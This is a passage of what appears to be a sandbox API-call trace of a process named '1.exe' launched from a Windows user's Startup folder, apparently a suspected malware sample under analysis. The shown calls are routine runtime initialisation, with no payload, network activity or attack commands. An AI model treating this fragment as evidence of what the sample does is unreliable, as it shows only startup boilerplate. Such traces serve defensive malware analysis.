os_tid = 0xa2c Thread: id = 61 os_tid = 0x9ec Thread: id = 62 os_tid = 0x9e8 Thread: id = 63 os_tid = 0x820 Thread: id = 64 os_tid = 0x68c Thread: id = 65 os_tid = 0x684 Thread: id = 66 os_tid = 0x61c Thread: id = 67 os_tid = 0x618 Thread: id = 68 os_tid = 0x610 Thread: id = 69 os_tid = 0x5a0 Thread: id = 70 os_tid = 0x59c Process: id = "12" image_name = "1.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" page_root = "0x2cc4e000" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xddc" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 71 os_tid = 0xf04 [0134.361] GetStartupInfoW (in: lpStartupInfo=0x98fa18 | out: lpStartupInfo=0x98fa18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0134.361] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.361] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x26a0000 [0134.366] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.366] GetProcAddress (hModule=0x74440000, lpProcName="FlsAlloc") returned 0x74454ae0 [0134.366] GetProcAddress (hModule=0x74440000, lpProcName="FlsGetValue") returned 0x74454b20 [0134.366] GetProcAddress (hModule=0x74440000, lpProcName="FlsSetValue") returned 0x74454b40 [0134.366] GetProcAddress (hModule=0x74440000, lpProcName="FlsFree") returned 0x74454b00 [0134.367] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x214) returned 0x26a05a8 [0134.367] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.367] GetCurrentThreadId () returned 0xf04 [0134.367] GetStartupInfoW (in: lpStartupInfo=0x98f9b4 | out: lpStartupInfo=0x98f9b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0134.367] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x800) returned 0x26a07c8 [0134.367] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0134.367] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.367] SetHandleCount (uNumber=0x20) returned 0x20 [0134.367] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " [0134.367] GetEnvironmentStringsW () returned 0xaaf4b0* [0134.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0134.368] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x565) returned 0x26a0fd0 [0134.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x26a0fd0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0134.368] FreeEnvironmentStringsW (penv=0xaaf4b0) returned 1 [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.368] GetACP () returned 0x4e4 [0134.368] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x220) returned 0x26a1540 [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.368] IsValidCodePage (CodePage=0x4e4) returned 1 [0134.368] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x98f97c | out: lpCPInfo=0x98f97c) returned 1 [0134.368] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x98f448 | out: lpCPInfo=0x98f448) returned 1 [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.368] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0134.368] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x98f1c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧ĕĀ") returned 256 [0134.368] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧ĕĀ", cchSrc=256, lpCharType=0x98f45c | out: lpCharType=0x98f45c) returned 1 [0134.368] GetLastError () returned 0xcb [0134.368] SetLastError (dwErrCode=0xcb) [0134.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0134.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x98f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0134.369] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0134.369] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x98ef88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0134.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x98f75c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x03\x04\xa4\xb1\x94\xf9\x98", lpUsedDefaultChar=0x0) returned 256 [0134.369] GetLastError () returned 0xcb [0134.369] SetLastError (dwErrCode=0xcb) [0134.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0134.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x98f85c, cbMultiByte=256, lpWideCharStr=0x98f1b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0134.369] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0134.369] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x98efa8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0134.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x98f65c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x03\x04\xa4\xb1\x94\xf9\x98", lpUsedDefaultChar=0x0) returned 256 [0134.369] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x115f728, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 